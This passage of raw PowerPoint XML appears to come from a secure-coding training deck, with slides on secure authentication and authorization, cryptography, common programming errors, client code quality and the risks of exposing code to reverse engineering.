              <a:t>Examples include granting anonymous access to a resource or service when authenticated and authorized access is required, and failing to maintain the user's identity when it is required.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure authentication and authorization controls are as secure as possible, but program your software as though these controls can be bypassed by an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform local authentication and authorization checks as needed, but be sure to enforce all authentication and authorization on the server side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Due to offline usage requirements, mobile apps may be required to perform local authentication or authorization checks within the mobile app's code. If this is the case, developers should implement local integrity checks within their code to detect any unauthorized code changes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure APIs and services cannot anonymously execute </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>calls without an access token.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide Secure Authentication (Slide 1 of 2) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="183013" y="1387385"/>
            <a:ext cx="1358175" cy="1174293"/>
            <a:chOff x="183013" y="1241081"/>
            <a:chExt cx="1358175" cy="1174293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8"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9D5BE50D-9406-45A9-837A-001AF1C5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55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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620725" y="1302040"/>
            <a:ext cx="7181350" cy="5219630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never store the user's password or shared secrets on the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enforce strong password policies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure authentication requirements of your various platforms match. For example, authentication requirements of your mobile and desktop applications should match those of the equivalent web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whenever possible, perform authentication requests on the server side. Load application data on the client only upon successful authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid storing sensitive data on the client. If you must do this, ensure that data will only be accessible upon successfully entering the correct credentials by using an encryption key that is securely derived from the user's login credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistent authentication ("remember me on this device") is not a safe default for mobile applications. Provide it as an opt-in setting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For mobile device applications, enable the user to revoke persistent authentication from a remote management console so the user can revoke access by stolen or lost devices.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide Secure Authentication (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="183013" y="1387385"/>
            <a:ext cx="1358175" cy="1174293"/>
            <a:chOff x="183013" y="1241081"/>
            <a:chExt cx="1358175" cy="1174293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8"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3E04D67E-3F81-41FA-AB44-23C6D9C4A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167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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620725" y="1302040"/>
            <a:ext cx="7181350" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incorrect or inappropriate use of cryptography can leave sensitive data exposed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect, make sure your software:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses cryptographic libraries provided by the system or expert-developed third-party libraries. Do not write your own cryptography libraries, unless you happen to be an expert in cryptography.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypts data in databases and other storage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doesn't include static encryption keys in your code. Generate encryption keys based on user input (such as a password or passcode).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only stores sensitive data on the mobile device when absolutely essential.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses the latest cryptographic standards.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follows NIST guidelines on recommended algorithms.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide Sufficient Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="183013" y="1387385"/>
            <a:ext cx="1358175" cy="1174293"/>
            <a:chOff x="183013" y="1241081"/>
            <a:chExt cx="1358175" cy="1174293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8"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962F4B62-7330-4454-8055-E1C4CB7E0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13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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620725" y="1302040"/>
            <a:ext cx="7181350" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Failure to authorize properly may enable an attacker to gain elevated privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An example of insecure authorization includes having client-side code that determines permissions based on authentication, where it facilitates a client-side attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect, make sure your software:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses only information contained in backend systems (nothing local to the client) to verify the roles and permissions of authenticated users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In backend code, independently verifies that any identifiers associated with a request match and belong to the incoming identity.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide Secure Authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="183013" y="1387385"/>
            <a:ext cx="1358175" cy="1174293"/>
            <a:chOff x="183013" y="1241081"/>
            <a:chExt cx="1358175" cy="1174293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8"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6FBD6E9A-C3F4-4283-940E-C06386799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4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803BF-C984-4242-8839-D5871754A300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common General Programming Errors (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C07EF89D-EDA1-4559-AD63-A4E495D1EA5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AA9E033-88C5-45FA-838E-CD72B8361663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1306529"/>
            <a:ext cx="7932614" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inappropriate use of dangerous functions, APIs, and system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of deprecated libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overruns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Race conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer range issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Out of bounds array indexing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unhandled exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory leaks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dangling and null pointer references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unused code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uninitialized variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBD70DD0-4F4B-4552-9E32-7CD93899E74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5731728" y="4953000"/>
            <a:ext cx="2878872" cy="1415760"/>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7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AE70406-AE6D-42DD-9AF2-5B887C2BECD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566057" y="5656526"/>
            <a:ext cx="8044543" cy="627864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Visual Studio compiler’s</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/GS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#pragma strict_gs_check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>can be set to perform automatic security checks for certain buffer overrun scenarios.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1808000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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620725" y="1302040"/>
            <a:ext cx="7181350" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A variety of client code quality problems on the client side (desktop and mobile apps, web clients, etc.) may lead to a wide range of security problems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples of client code quality problems include buffer overflows and format string vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write code that is easy to read and well-documented.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow consistent coding patterns agreed upon by everyone on the development team.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always validate that the lengths of incoming buffer data will not exceed the length of the target buffer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use static analysis tools to identify buffer overflows and memory leaks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure Client Code Quality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="183013" y="1387385"/>
            <a:ext cx="1358175" cy="1174293"/>
            <a:chOff x="183013" y="1241081"/>
            <a:chExt cx="1358175" cy="1174293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8"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Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7A112D9-D241-458A-B339-B94B06BDC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67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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620725" y="1302040"/>
            <a:ext cx="7181350" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exposure of code and data may enable an attacker to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify vulnerabilities, information about back-end servers, cryptographic constants and ciphers, and intellectual property.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directly modify an application's functionality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change the contents of memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change or replace system APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modify data and resources in order to subvert the intended use of the software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mobile apps are especially vulnerable to reverse engineering and code tampering.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To reverse engineer, the attacker processes exposed files (such as an app package on a mobile device) to extract its source code, libraries, algorithms, and other assets.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
